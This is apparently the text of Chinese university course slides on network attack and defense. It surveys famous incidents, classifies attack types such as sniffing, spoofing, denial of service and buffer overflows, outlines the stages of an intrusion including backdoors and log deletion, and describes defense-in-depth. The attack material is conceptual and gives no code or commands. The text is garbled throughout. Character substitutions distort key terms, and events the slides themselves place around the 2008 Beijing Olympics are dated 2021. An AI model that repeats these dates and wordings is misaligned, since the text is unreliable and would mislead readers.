網(wǎng)絡(luò)攻擊與防御260

網(wǎng)絡(luò)攻擊與防御成都信息工程學(xué)院信息平安教研室內(nèi)容簡(jiǎn)介本課程主要內(nèi)容：網(wǎng)絡(luò)平安概述信息收集網(wǎng)絡(luò)掃描基于系統(tǒng)的攻擊與防御〔windows系統(tǒng)〕腳本攻擊與防御惡意代碼攻擊與防御本課要求上課20學(xué)時(shí)上機(jī)12學(xué)時(shí)考試模式：閉卷成績(jī)構(gòu)成：卷面成績(jī)*70%+平時(shí)成績(jī)*30%平時(shí)成績(jī)構(gòu)成：上課30%+上機(jī)70%第一章網(wǎng)絡(luò)平安概述成都信息工程學(xué)院信息平安教研室1.1、嚴(yán)峻的信息平安問(wèn)題2000年2月6日前后，美國(guó)YAHOO等8家大型網(wǎng)站接連遭受黑客的攻擊，直接經(jīng)濟(jì)損失約為12億美元〔網(wǎng)上拍賣“電子港灣〞網(wǎng)站、亞馬遜網(wǎng)站、AOL〕此次平安事故具有以下的特點(diǎn)：攻擊直接針對(duì)商業(yè)應(yīng)用攻擊造成的損失巨大信息網(wǎng)絡(luò)平安關(guān)系到全社會(huì)2021年中國(guó)信息平安熱點(diǎn)1.中國(guó)超過(guò)美國(guó)成為全球第一大擁有互聯(lián)網(wǎng)用戶數(shù)的國(guó)家

截至2021年6月，中國(guó)網(wǎng)民數(shù)量到達(dá)2.53億，成為世界上網(wǎng)民最多的國(guó)家。同時(shí)，443端口的流量端口排名從2007年的第4位上升到第2位，這說(shuō)明已經(jīng)有大量網(wǎng)站部署了SSL證書(shū)來(lái)確保網(wǎng)上機(jī)密信息安2.電信運(yùn)營(yíng)商開(kāi)始重視用戶機(jī)密信息平安

中國(guó)電信、中國(guó)移動(dòng)等局部省級(jí)分公司已經(jīng)開(kāi)始在網(wǎng)上營(yíng)業(yè)廳及其他系統(tǒng)部署SSL證書(shū)來(lái)確保用戶機(jī)密信息的平安，這說(shuō)明中國(guó)的電信運(yùn)營(yíng)商開(kāi)始從各個(gè)方面與國(guó)際大運(yùn)營(yíng)商看齊，為廣闊電信用戶提供更加平安可靠的信息效勞。3.金融危機(jī)席卷全球信息平安更具投資價(jià)值

全球金融風(fēng)暴已經(jīng)從金融行業(yè)向其他行業(yè)蔓延，裁員企業(yè)面臨由離職人員帶來(lái)的商業(yè)機(jī)密外泄問(wèn)題，加強(qiáng)對(duì)商業(yè)機(jī)密的保護(hù)，降低業(yè)務(wù)運(yùn)營(yíng)本錢，相關(guān)平安效勞商呈現(xiàn)巨大商機(jī)。企業(yè)選購(gòu)信息平安產(chǎn)品(包括SSL證書(shū))將更加理性化，更加注重性能價(jià)格比，而并非一味追求品牌。

4.2021年“放心平安用網(wǎng)銀〞聯(lián)合宣傳年主題：共筑網(wǎng)上銀行綠色通道

4月2日國(guó)內(nèi)18家銀行攜手，啟動(dòng)“2021放心平安用網(wǎng)銀聯(lián)合宣傳年〞活動(dòng)，共筑網(wǎng)上銀行綠色通道，著力為用戶打造一個(gè)更平安的使用網(wǎng)上銀行的環(huán)境。本次活動(dòng)推出的網(wǎng)銀綠色通道，由三大核心體系構(gòu)成：EV證書(shū)，網(wǎng)銀病毒專殺工具和反欺詐聯(lián)動(dòng)機(jī)制，分別從反釣魚(yú)網(wǎng)站，反病毒木馬盜竊，打擊網(wǎng)銀犯罪三個(gè)層次為網(wǎng)銀使用提供全方位保護(hù)5.奧運(yùn)信息平安有保障

奧運(yùn)會(huì)比賽的順利進(jìn)行與信息平安系統(tǒng)的大力保障息息相關(guān)，北京2021年奧運(yùn)會(huì)的圓滿成功說(shuō)明了針對(duì)包括效勞器、網(wǎng)絡(luò)交換機(jī)、路由器、應(yīng)用軟件系統(tǒng)等17,000多個(gè)系統(tǒng)的信息平安有保障。

6.2021首屆Symbian智能峰會(huì)在北京召開(kāi)

此次Symbian頂峰論壇是由Symbian中國(guó)公司首次發(fā)起于2021年6月5日在北京召開(kāi)，智能產(chǎn)業(yè)鏈中各個(gè)環(huán)節(jié)的合作伙伴共同參與了此次盛會(huì)。在本次峰會(huì)展示了Symbian公司十年開(kāi)展成就與品牌殊榮，并以“明日的科技，今日的〞為主題，圍繞智能相關(guān)技術(shù)話題展開(kāi)深入討論與交流，其中“智能平臺(tái)平安和代碼平安〞最廣泛關(guān)注。7.地震、雪災(zāi)捐款網(wǎng)站被假冒或被“掛馬〞

廣闊網(wǎng)民對(duì)四川地震災(zāi)區(qū)和南方雪災(zāi)開(kāi)始了規(guī)模空前的捐助活動(dòng)，小額網(wǎng)上捐款得到了普遍歡送。但由于捐款網(wǎng)站沒(méi)有部署SSL證書(shū)而極易被不法分子假冒。相比之下，美國(guó)中選總統(tǒng)奧巴馬的網(wǎng)上募捐網(wǎng)站就部署了SSL證書(shū)，這樣既保證了捐款人的網(wǎng)上機(jī)密信息平安，也保證了募捐網(wǎng)站不會(huì)被假冒。8.2021中國(guó)計(jì)算機(jī)網(wǎng)絡(luò)平安應(yīng)急年會(huì)暨中國(guó)互聯(lián)網(wǎng)協(xié)會(huì)網(wǎng)絡(luò)平安工作年會(huì)在深圳召開(kāi)

2021年4月7日-9日，由國(guó)家計(jì)算機(jī)網(wǎng)絡(luò)應(yīng)急技術(shù)處理協(xié)調(diào)中心聯(lián)合中國(guó)互聯(lián)網(wǎng)協(xié)會(huì)網(wǎng)絡(luò)與信息平安工作委員會(huì)主辦的“2021中國(guó)計(jì)算機(jī)網(wǎng)絡(luò)平安應(yīng)急年會(huì)暨中國(guó)互聯(lián)網(wǎng)協(xié)會(huì)網(wǎng)絡(luò)平安工作年會(huì)〞在深圳勝利召開(kāi)。工業(yè)和信息化部奚國(guó)華副部長(zhǎng)到會(huì)祝賀并作題為“加強(qiáng)網(wǎng)絡(luò)平安、助力北京奧運(yùn)〞的主旨報(bào)告。本次年會(huì)共設(shè)有“電子政務(wù)平安〞、“電子商務(wù)和金融平安〞、“ISP&ICP平安〞、“網(wǎng)絡(luò)平安信息技術(shù)〞四個(gè)分論壇，與會(huì)領(lǐng)導(dǎo)、專家、學(xué)者圍繞電子政務(wù)和電子商務(wù)平安、根底信息網(wǎng)絡(luò)平安保障、培育健康有序的網(wǎng)絡(luò)平安文化、網(wǎng)絡(luò)平安應(yīng)急的國(guó)際合作、重點(diǎn)城市的網(wǎng)絡(luò)平安事件應(yīng)急處置、平安漏洞的現(xiàn)狀與開(kāi)展趨勢(shì)等諸多話題進(jìn)行了廣泛而深入的交流與探討。9.公安部開(kāi)展2021年度信息網(wǎng)絡(luò)平安狀況調(diào)查

公安部公共信息網(wǎng)絡(luò)平安監(jiān)察局于4月26日至5月26日組織開(kāi)展2021年度全國(guó)信息網(wǎng)絡(luò)平安狀況和計(jì)算機(jī)病毒疫情調(diào)查活動(dòng)。調(diào)查顯示，我國(guó)信息網(wǎng)絡(luò)平安事件發(fā)生比例繼前3年連續(xù)增長(zhǎng)后，今年略有下降，信息網(wǎng)絡(luò)平安事件發(fā)生比例為62.7%，同比下降了3％；計(jì)算機(jī)病毒感染率為85.5％，同比減少了6％，說(shuō)明我國(guó)互聯(lián)網(wǎng)平安狀況有所好轉(zhuǎn)。但屢次發(fā)生網(wǎng)絡(luò)平安事件的比例為50％，屢次感染病毒的比例為66.8％，說(shuō)明我國(guó)互聯(lián)網(wǎng)用戶的網(wǎng)絡(luò)平安意識(shí)仍比較薄弱,對(duì)發(fā)生網(wǎng)絡(luò)平安事件未給予足夠重視。10.構(gòu)建可信網(wǎng)絡(luò)，“中國(guó)反釣魚(yú)網(wǎng)站聯(lián)盟〞成立

2021年7月18日，由國(guó)內(nèi)銀行證券機(jī)構(gòu)、電子商務(wù)網(wǎng)站、域名注冊(cè)管理機(jī)構(gòu)、域名注冊(cè)效勞機(jī)構(gòu)、專家學(xué)者組成的“中國(guó)反釣魚(yú)網(wǎng)站聯(lián)盟〞在京正式宣布成立。聯(lián)盟已初步建立快速解決機(jī)制，借助停止釣魚(yú)網(wǎng)站CN域名解析等手段，及時(shí)終止其危害，構(gòu)建可信網(wǎng)絡(luò)。1.2、急需解決的假設(shè)干平安問(wèn)題信息平安與高技術(shù)犯罪1999年，上海XX證券部電腦主機(jī)被入侵2000年2月14日，中國(guó)選擇網(wǎng)〔上?！呈艿胶诳凸?，造成客戶端機(jī)器崩潰，并采用類似攻擊YAHOO的手法，通過(guò)攻擊效勞器端口，造成內(nèi)存耗盡和效勞器崩潰我國(guó)約有64%的公司信息系統(tǒng)受到攻擊，其中金融業(yè)占總數(shù)的57%不受歡送的垃圾郵件的現(xiàn)象愈演愈烈1999年4月26日，CIH病毒“世紀(jì)風(fēng)暴〞媒體內(nèi)容的平安性凱文米特尼克凱文?米特尼克是美國(guó)20世紀(jì)最著名的黑客之一，他是“社會(huì)工程學(xué)〞的創(chuàng)始人1979年他和他的伙伴侵入了北美空防指揮部1983年的電影?戰(zhàn)爭(zhēng)游戲?演繹了同樣的故事，在片中，以凱文為原型的少年黑客幾乎引發(fā)了第三次世界大戰(zhàn)莫里斯蠕蟲(chóng)〔MorrisWorm〕時(shí)間1988年肇事者-RobertT.Morris,美國(guó)康奈爾大學(xué)學(xué)生，其父是美國(guó)國(guó)家平安局平安專家機(jī)理-利用sendmail,finger等效勞的漏洞，消耗CPU資源，拒絕效勞影響-Internet上大約6000臺(tái)計(jì)算機(jī)感染，占當(dāng)時(shí)Internet聯(lián)網(wǎng)主機(jī)總數(shù)的10%，造成9600萬(wàn)美元的損失CERT/CC的誕生-DARPA成立CERT〔ComputerEmergencyResponseTeam〕，以應(yīng)付類似“蠕蟲(chóng)〔MorrisWorm〕〞事件94年末，俄羅斯黑客弗拉基米爾·利文與其伙伴從圣彼得堡的一家小軟件公司的聯(lián)網(wǎng)計(jì)算機(jī)上，向美國(guó)CITYBANK銀行發(fā)動(dòng)了一連串攻擊，通過(guò)電子轉(zhuǎn)帳方式，從CITYBANK銀行在紐約的計(jì)算機(jī)主機(jī)里竊取1100萬(wàn)美元96年8月17日，美國(guó)司法部的網(wǎng)絡(luò)效勞器遭到黑客入侵，并將“美國(guó)司法部〞的主頁(yè)改為“美國(guó)不公正部〞，將司法部部長(zhǎng)的照片換成了阿道夫·希特勒，將司法部徽章?lián)Q成了納粹黨徽，并加上一幅色情女郎的圖片作為所謂司法部部長(zhǎng)的助手。此外還留下了很多攻擊美國(guó)司法政策的文字96年9月18日，黑客光臨美國(guó)中央情報(bào)局的網(wǎng)絡(luò)效勞器，將其主頁(yè)由“中央情報(bào)局〞改為“中央愚蠢局〞96年12月29日，黑客侵入美國(guó)空軍的全球網(wǎng)網(wǎng)址并將其主頁(yè)肆意改動(dòng)，其中有關(guān)空軍介紹、新聞發(fā)布等內(nèi)容被替換成一段簡(jiǎn)短的黃色錄象，且聲稱美國(guó)政府所說(shuō)的一切都是謊話。迫使美國(guó)國(guó)防部一度關(guān)閉了其他80多個(gè)軍方網(wǎng)址98年2月25日，美國(guó)國(guó)防部四個(gè)海軍系統(tǒng)和七個(gè)空軍系統(tǒng)的電腦網(wǎng)頁(yè)遭侵入98年5月底，印度原子研究中心的主頁(yè)()遭侵入98年8月31日，澳大利亞主要政黨和政府官員的網(wǎng)站遭黑客襲擊，網(wǎng)址被篡改98年9月13日，紐約時(shí)報(bào)站點(diǎn)〔〕遭黑客襲擊2000年2月，著名的Yahoo、eBay等高利潤(rùn)站點(diǎn)遭到持續(xù)兩天的拒絕效勞攻擊，商業(yè)損失巨大2002年3月底，美國(guó)華盛頓著名藝術(shù)家GloriaGeary在eBay拍賣網(wǎng)站的帳戶，被黑客利用來(lái)拍賣IntelPentium芯片2002年6月，日本2002年世界杯組委會(huì)的官方網(wǎng)站由于黑客成功侵入并在該網(wǎng)站上發(fā)布侮辱性內(nèi)容而被迫關(guān)閉中美五一黑客大戰(zhàn)2001年5月1日是國(guó)際勞動(dòng)節(jié)，5月4日是中國(guó)的青年節(jié)，而5月7日那么是中國(guó)在南斯拉夫的大使館被炸兩周年的紀(jì)念日。中國(guó)黑客在這幾個(gè)重大的紀(jì)念日期間對(duì)美國(guó)網(wǎng)站發(fā)起了大規(guī)模的攻擊美國(guó)局部被黑網(wǎng)站美國(guó)加利福尼亞能源部日美社會(huì)文化交流會(huì)白宮歷史協(xié)會(huì)UPI新聞效勞網(wǎng)華盛頓海軍通信站國(guó)內(nèi)網(wǎng)站遭攻擊的分布紅色代碼2001年7月19日，全球的入侵檢測(cè)系統(tǒng)(IDS)幾乎同時(shí)報(bào)告遭到不名蠕蟲(chóng)攻擊在紅色代碼首次爆發(fā)的短短9小時(shí)內(nèi)，以迅雷不及掩耳之勢(shì)迅速感染了250,000臺(tái)效勞器最初發(fā)現(xiàn)的紅色代碼蠕蟲(chóng)只是篡改英文站點(diǎn)主頁(yè)，顯示“Welcometo://!HackedbyChinese!〞隨后的紅色代碼蠕蟲(chóng)便如同洪水般在互聯(lián)網(wǎng)上泛濫，發(fā)動(dòng)拒絕效勞(DoS)攻擊以及格式化目標(biāo)系統(tǒng)硬盤，并會(huì)在每月20日～28日對(duì)白宮的WWW站點(diǎn)的IP地址發(fā)動(dòng)DoS攻擊，使白宮的WWW站點(diǎn)不得不全部更改自己的IP地址?！凹t色代碼〞的蔓延速度尼姆達(dá)〔Nimda〕尼姆達(dá)是在9·11恐怖襲擊整整一個(gè)星期后出現(xiàn)的，當(dāng)時(shí)傳言是中國(guó)為了試探美國(guó)對(duì)網(wǎng)絡(luò)恐怖襲擊的快速反響能力而散布了尼姆達(dá)病毒尼姆達(dá)是在早上9:08發(fā)現(xiàn)的，明顯比紅色代碼更快、更具有摧毀功能，半小時(shí)之內(nèi)就傳遍了整個(gè)世界。隨后在全球各地侵襲了830萬(wàn)部電腦，總共造成將近10億美元的經(jīng)濟(jì)損失傳播方式包括：電子郵件、網(wǎng)絡(luò)臨近共享文件、IE瀏覽器的內(nèi)嵌MIME類型自動(dòng)執(zhí)行漏洞、IIS效勞器文件目錄遍歷漏洞、CodeRedII和Sadmind/IIS蠕蟲(chóng)留下的后門等SQLSlammer蠕蟲(chóng)Slammer的傳播數(shù)度比“紅色代碼〞快兩個(gè)數(shù)量級(jí)在頭一分鐘之內(nèi)，感染主機(jī)數(shù)量每8.5秒增長(zhǎng)一倍；3分鐘后該病毒的傳播速度到達(dá)峰值〔每秒鐘進(jìn)行5500萬(wàn)次掃描〕；接下來(lái)，其傳播速度由于自身擠占了絕大局部網(wǎng)絡(luò)帶寬而開(kāi)始下降；10分鐘后，易受攻擊的主機(jī)根本上已經(jīng)被感染殆盡30分鐘后在全球的感染面積2003年8月11日首先被發(fā)現(xiàn)，然后迅速擴(kuò)散，這時(shí)候距離被利用漏洞的發(fā)布日期還不到1個(gè)月該蠕蟲(chóng)病毒針對(duì)的系統(tǒng)類型范圍相當(dāng)廣泛〔包括WindowsNT/2000/XP〕截至8月24日，國(guó)內(nèi)被感染主機(jī)的數(shù)目為25~100萬(wàn)臺(tái)全球直接經(jīng)濟(jì)損失幾十億美金RPCDCOM蠕蟲(chóng)1.3網(wǎng)絡(luò)平安概念網(wǎng)絡(luò)平安的意義 所謂“網(wǎng)絡(luò)平安〞，是指網(wǎng)絡(luò)系統(tǒng)的硬件、軟件及其系統(tǒng)中的數(shù)據(jù)受到保護(hù)，不因偶然的或者惡意的原因而遭到破壞、更改、泄露，系統(tǒng)可以連續(xù)可靠正常地運(yùn)行，網(wǎng)絡(luò)效勞不被中斷。2網(wǎng)絡(luò)攻擊與防御根底2.1遠(yuǎn)程攻擊根底A．攻擊的位置〔1〕遠(yuǎn)程攻擊〔2〕本地攻擊〔3〕偽遠(yuǎn)程攻擊B.攻擊的深度表層攻擊讀訪問(wèn)非根式的寫與執(zhí)行訪問(wèn)根式的寫和執(zhí)行訪問(wèn)

簡(jiǎn)單拒絕效勞；本地用戶獲得非授權(quán)讀權(quán)限；本地用戶獲得非授權(quán)寫權(quán)限；遠(yuǎn)程用戶獲得非授權(quán)帳號(hào)信息；遠(yuǎn)程用戶獲得特權(quán)文件的讀權(quán)限；遠(yuǎn)程用戶獲得特權(quán)文件的寫權(quán)限；遠(yuǎn)程用戶擁有了系統(tǒng)管理員權(quán)限。C.攻擊的層次之間的關(guān)系D.攻擊分類在最高層次，攻擊被分為兩類：主動(dòng)攻擊：包含攻擊者訪問(wèn)他所需要信息的成心行為。主動(dòng)攻擊包括拒絕效勞攻擊、信息篡改、資源使用、欺騙等攻擊方法。

被動(dòng)攻擊：主要是收集信息而不是進(jìn)行訪問(wèn)，數(shù)據(jù)的合法用戶對(duì)這種活動(dòng)一點(diǎn)也不會(huì)覺(jué)察到。被動(dòng)攻擊包括嗅探、信息收集等攻擊方法。圖1、攻擊分類就目前常見(jiàn)的攻擊，大致可以分為幾大類〔參見(jiàn)圖1〕：竊聽(tīng)：指攻擊者通過(guò)非法手段對(duì)系統(tǒng)活動(dòng)的監(jiān)視從而獲得一些平安關(guān)鍵信息。目前屬于竊聽(tīng)技術(shù)的常用攻擊方法有：鍵擊記錄：是植入操作系統(tǒng)內(nèi)核的隱蔽軟件，通常實(shí)現(xiàn)為一個(gè)鍵盤設(shè)備驅(qū)動(dòng)程序，能夠把每次鍵擊都記錄下來(lái)，存放到攻擊者指定的隱藏的本地文件中。如PCAgent等。網(wǎng)絡(luò)監(jiān)聽(tīng)：是攻擊者一旦在目標(biāo)網(wǎng)絡(luò)上獲得一個(gè)立足點(diǎn)之后刺探網(wǎng)絡(luò)情報(bào)的最有效方法，通過(guò)設(shè)置網(wǎng)卡的混雜模式獲得網(wǎng)絡(luò)上所有的數(shù)據(jù)包，并從中抽取平安關(guān)鍵信息，如明文方式傳輸?shù)目诹?。如Win32平臺(tái)下的sniffer等免費(fèi)工具，Unix平臺(tái)下的libpcap網(wǎng)絡(luò)監(jiān)聽(tīng)工具庫(kù)。非法訪問(wèn)數(shù)據(jù)：是攻擊者或內(nèi)部人員違反平安策略對(duì)其訪問(wèn)權(quán)限之外的數(shù)據(jù)進(jìn)行非法訪問(wèn)。獲取密碼文件：攻擊者進(jìn)行口令破解獲取特權(quán)用戶或其他用戶口令的必要前提。欺騙：指攻擊者通過(guò)冒充正常用戶以獲取對(duì)攻擊目標(biāo)訪問(wèn)權(quán)或獲取關(guān)鍵信息的攻擊方法，屬于此類攻擊的方法有：獲取口令：通過(guò)缺省口令、口令猜測(cè)和口令破解三種途徑。針對(duì)一些弱口令進(jìn)行猜測(cè)。也可以使用專門的口令猜測(cè)工具進(jìn)行口令破解，如遍歷字典或高頻密碼列表從而找到正確的口令。如Win32平臺(tái)的LOphtcrack等。惡意代碼：包括特洛伊木馬應(yīng)用程序、郵件病毒、網(wǎng)頁(yè)病毒等，通常冒充成有用的軟件工具、重要的信息等，誘導(dǎo)用戶下載運(yùn)行或利用郵件客戶端和瀏覽器的自動(dòng)運(yùn)行機(jī)制，在啟動(dòng)后悄悄安裝惡意程序，通常為攻擊者給出能夠完全控制該主機(jī)的遠(yuǎn)程連接。網(wǎng)絡(luò)欺騙：攻擊者通過(guò)向攻擊目標(biāo)發(fā)送冒充其信任主機(jī)的網(wǎng)絡(luò)數(shù)據(jù)包，到達(dá)獲取訪問(wèn)權(quán)或執(zhí)行命令的攻擊方法。具體的有IP欺騙、會(huì)話劫持、ARP重定向和RIP路由欺騙等。拒絕效勞：指終端或者完全拒絕對(duì)合法用戶、網(wǎng)絡(luò)、系統(tǒng)和其他資源的效勞的攻擊方法，其意圖就是徹底破壞，這也是比較容易實(shí)現(xiàn)的攻擊方法。特別是分布式拒絕效勞攻擊對(duì)目前的互聯(lián)網(wǎng)構(gòu)成了嚴(yán)重的威脅，造成的經(jīng)濟(jì)損失也極為龐大。拒絕效勞攻擊的類型按其攻擊形式分為：導(dǎo)致異常型：利用軟硬件實(shí)現(xiàn)上的編程缺陷，導(dǎo)致其出現(xiàn)異常，從而使其拒絕效勞。如PingofDeath攻擊等。資源耗盡型：通過(guò)大量消耗資源使得攻擊目標(biāo)由于資源耗盡不能提供正常的效勞。視資源類型的不同可分為帶寬耗盡和系統(tǒng)資源耗盡兩類。帶寬耗盡攻擊的本質(zhì)是攻擊者通過(guò)放大等技巧消耗掉目標(biāo)網(wǎng)絡(luò)的所有帶寬，如Smurf攻擊等。系統(tǒng)資源耗盡型攻擊指對(duì)系統(tǒng)內(nèi)存、CPU或程序中的其他資源進(jìn)行消耗，使其無(wú)法滿足正常提供效勞的需求。如SynFlood攻擊等。欺騙型：ARP拒絕效勞攻擊數(shù)據(jù)驅(qū)動(dòng)攻擊：通過(guò)向某個(gè)程序發(fā)送數(shù)據(jù)，以產(chǎn)生非預(yù)期結(jié)果的攻擊，通常為攻擊者給出訪問(wèn)目標(biāo)系統(tǒng)的權(quán)限，大致可分為：緩沖區(qū)溢出：通過(guò)往程序的緩沖區(qū)寫入超出其邊界的內(nèi)容，造成緩沖區(qū)的溢出，使得程序轉(zhuǎn)而執(zhí)行其他攻擊者指定的代碼，通常是為攻擊者翻開(kāi)遠(yuǎn)程連接的ShellCode，以到達(dá)攻擊目標(biāo)。如Windows平臺(tái)下的Code-Red、Blaster、Sasser等都是通過(guò)緩沖區(qū)溢出攻擊獲得系統(tǒng)管理員權(quán)限后進(jìn)行傳播。格式化字符串攻擊：主要是利用由于格式化函數(shù)的微妙程序設(shè)計(jì)錯(cuò)誤造成的平安漏洞，通過(guò)傳遞精心編制的含有格式化指令的文本字符串，以使目標(biāo)程序執(zhí)行任意命令。輸入驗(yàn)證攻擊：針對(duì)程序未能對(duì)輸入進(jìn)行有效的驗(yàn)證的平安漏洞，使得攻擊者能夠讓程序執(zhí)行指令的命令。最著名的是1996年的PHF攻擊。同步漏洞攻擊：利用程序在處理同步操作時(shí)的缺陷，如競(jìng)爭(zhēng)狀態(tài)、信號(hào)處理等問(wèn)題，以獲得更高權(quán)限的訪問(wèn)。信任漏洞攻擊：利用程序?yàn)E設(shè)的信任關(guān)系獲取訪問(wèn)權(quán)的一種方法，如Win32平臺(tái)下互為映象的本地和域Administrator憑證、LSA密碼等。2.2遠(yuǎn)程攻擊的動(dòng)機(jī)分析和一般流程

A.黑客為什么要攻擊？想要在別人面前炫耀自己的技術(shù)，如進(jìn)入別人的電腦去修改一個(gè)文件或目錄名。惡作劇、練功，這是許多人或?qū)W生入侵或破壞的最主要原因，除了有練功的效果外還有些許網(wǎng)絡(luò)探險(xiǎn)的感覺(jué)。竊取數(shù)據(jù)，可能是偷取硬盤中的文件或各種上網(wǎng)密碼，然后從事各種商業(yè)應(yīng)用。想復(fù)仇的事后報(bào)復(fù)者，如對(duì)老板或公司制度不滿，事先把報(bào)復(fù)程序或病毒程序?qū)懭胨幊绦?，并?guī)定在將來(lái)某時(shí)，或某條件下激活發(fā)作，摧毀原公司網(wǎng)絡(luò)系統(tǒng)。抗議或宣示，如2001年5月1日中美黑客大戰(zhàn)，中美兩國(guó)的黑客相互攻擊對(duì)方網(wǎng)站，雙方均有數(shù)以千計(jì)的網(wǎng)站遭到攻擊，輕者被篡改主頁(yè)面，嚴(yán)重的那么整個(gè)系統(tǒng)遭受消滅性打擊。B.黑客攻擊流程攻擊的一般過(guò)程預(yù)攻擊內(nèi)容：獲得域名及IP分布獲得拓?fù)浼癘S等獲得端口和服務(wù)獲得應(yīng)用系統(tǒng)情況跟蹤新漏洞發(fā)布目的：收集信息，進(jìn)行進(jìn)一步攻擊決策攻擊內(nèi)容：獲得遠(yuǎn)程權(quán)限進(jìn)入遠(yuǎn)程系統(tǒng)提升本地權(quán)限進(jìn)一步擴(kuò)展權(quán)限進(jìn)行實(shí)質(zhì)性操作目的：進(jìn)行攻擊，獲得系統(tǒng)的一定權(quán)限后攻擊內(nèi)容：植入后門木馬刪除日志修補(bǔ)明顯的漏洞進(jìn)一步滲透擴(kuò)展目的：消除痕跡，長(zhǎng)期維持一定的權(quán)限2.3網(wǎng)絡(luò)防御意義

進(jìn)攻和防御是對(duì)立統(tǒng)一的矛盾體必須樹(shù)立“積極防御〞的網(wǎng)絡(luò)戰(zhàn)指導(dǎo)思想，因?yàn)樵诰W(wǎng)絡(luò)戰(zhàn)中“進(jìn)攻未必就是最好的防御〞。“網(wǎng)絡(luò)防御作戰(zhàn)〞的成熟研究，是網(wǎng)絡(luò)戰(zhàn)盡早到達(dá)“攻防平衡〞的前提和根底。2.4網(wǎng)絡(luò)防御構(gòu)架

網(wǎng)絡(luò)防護(hù)被動(dòng)防護(hù)：包括路由器過(guò)濾、防火墻等主動(dòng)防護(hù)：在充分利用被動(dòng)防護(hù)技術(shù)的根底上，還包括攻擊預(yù)警、入侵檢測(cè)、網(wǎng)絡(luò)攻擊誘騙和反向攻擊等網(wǎng)絡(luò)主動(dòng)防御技術(shù) 在增強(qiáng)和保證被網(wǎng)絡(luò)平安性的同時(shí)，及時(shí)發(fā)現(xiàn)正在遭受的攻擊并及時(shí)采取各種措施使攻擊者不能到達(dá)其目的，使自己的損失降到最低的各種方法和技術(shù)。網(wǎng)絡(luò)主動(dòng)防御平安模型管理——對(duì)技術(shù)的管理、對(duì)人的管理、對(duì)政策的管理對(duì)技術(shù)的管理——通過(guò)策略進(jìn)行，以使各種平安技術(shù)能成為一個(gè)有機(jī)的整體，從而提高系統(tǒng)的整體防護(hù)能力。對(duì)人的管理——通過(guò)各種政策和平安制度對(duì)參與信息系統(tǒng)的人員進(jìn)行平安制度強(qiáng)制的執(zhí)行、平安意識(shí)和平安技術(shù)的培訓(xùn)等，增強(qiáng)參與信息系統(tǒng)的人員的平安意識(shí)和遵紀(jì)守法意識(shí)，提高平安警覺(jué)性，從而加強(qiáng)系統(tǒng)的整體平安性。對(duì)政策的管理——包括政策的制定、執(zhí)行和改進(jìn)等。策略——將各種平安技術(shù)有機(jī)結(jié)合起來(lái)的關(guān)鍵?？v深防御策略縱深防御策略描述如下：網(wǎng)絡(luò)平安首先是網(wǎng)絡(luò)管理的平安，這包括對(duì)技術(shù)管理的平安、對(duì)人員管理的平安和對(duì)政策管理的平安。這是一個(gè)層次性的循環(huán)防御策略，該層次性的結(jié)構(gòu)可以根據(jù)網(wǎng)絡(luò)攻擊的深入提供不同層次的防護(hù)。層與層之間必須進(jìn)行信息交互，也可跨層進(jìn)行信息交互，信息的交互需要利用平安的網(wǎng)絡(luò)通信協(xié)議進(jìn)行。各層子系統(tǒng)進(jìn)行信息交互的目的就是使各層間相互配合來(lái)保證一層被攻破，會(huì)有下一層的防護(hù)阻止網(wǎng)絡(luò)攻擊的繼續(xù)進(jìn)行。網(wǎng)絡(luò)內(nèi)部的攻擊比外部攻擊要容易，其危害更大。所以網(wǎng)絡(luò)監(jiān)控系統(tǒng)要實(shí)時(shí)監(jiān)控內(nèi)部網(wǎng)絡(luò)的各個(gè)主機(jī)行為，并根據(jù)相應(yīng)的策略限制網(wǎng)絡(luò)內(nèi)部的可能的異常行為。技術(shù)操作人縱深防御策略的防護(hù)流程Step1：根據(jù)對(duì)已經(jīng)發(fā)生的網(wǎng)絡(luò)攻擊或正在發(fā)生的網(wǎng)絡(luò)攻擊及其趨勢(shì)的分析，以及對(duì)本地網(wǎng)絡(luò)的平安性分析，預(yù)警對(duì)可能發(fā)生的網(wǎng)絡(luò)攻擊提出警告。Step2：網(wǎng)絡(luò)系統(tǒng)的各種保護(hù)手段〔如防火墻〕除了在平時(shí)根據(jù)其各自的平安策略正常運(yùn)行外，還要對(duì)預(yù)警發(fā)出的警告做出及時(shí)的反響，從而能夠在本防護(hù)階段最大限度的阻止網(wǎng)絡(luò)攻擊行為。Step3：檢測(cè)手段包括入侵檢測(cè)、網(wǎng)絡(luò)監(jiān)控和網(wǎng)絡(luò)系統(tǒng)信息和漏洞信息檢測(cè)等。其中的漏洞信息檢測(cè)在縱深防御的假設(shè)干階段都要用到，比方預(yù)警、檢測(cè)和還擊等。入侵檢測(cè)檢測(cè)到網(wǎng)絡(luò)入侵行為后要及時(shí)通知其他的防護(hù)手段，比方防火墻、網(wǎng)絡(luò)監(jiān)控、網(wǎng)絡(luò)攻擊響應(yīng)等。網(wǎng)絡(luò)監(jiān)控系統(tǒng)不僅可以實(shí)時(shí)監(jiān)控本地網(wǎng)絡(luò)的行為從而阻止來(lái)自內(nèi)部網(wǎng)絡(luò)的攻擊，同時(shí)也可作為入侵檢測(cè)系統(tǒng)的有益補(bǔ)充。Step4:只有及時(shí)的響應(yīng)才能使網(wǎng)絡(luò)攻擊造成的損失降到最低。響應(yīng)除了根據(jù)檢測(cè)的入侵行為及時(shí)地調(diào)整相關(guān)手段〔如防火墻、網(wǎng)絡(luò)監(jiān)控〕來(lái)阻止進(jìn)一步的網(wǎng)絡(luò)攻擊，還包括其他的主動(dòng)積極的技術(shù)：網(wǎng)絡(luò)僚機(jī)、網(wǎng)絡(luò)攻擊誘騙、網(wǎng)絡(luò)攻擊源精確定位和電子取證等。 網(wǎng)路僚機(jī)：如蜜罐系統(tǒng)。一方面可以犧牲自己來(lái)保護(hù)網(wǎng)絡(luò)，另一方面可以收集網(wǎng)絡(luò)攻擊者信息，為攻擊源定位和電子取證提供信息。 網(wǎng)絡(luò)攻擊誘騙：顯著提高網(wǎng)絡(luò)攻擊的代價(jià)，并可以將網(wǎng)絡(luò)攻擊流量引導(dǎo)到其他主機(jī)上。 網(wǎng)絡(luò)攻擊源定位：除了可以利用網(wǎng)絡(luò)僚機(jī)和網(wǎng)絡(luò)攻擊誘騙的信息外，還可以利用其他技術(shù)〔如移動(dòng)Agent、只能分布式Agent、流量分析〕來(lái)定位攻擊源。 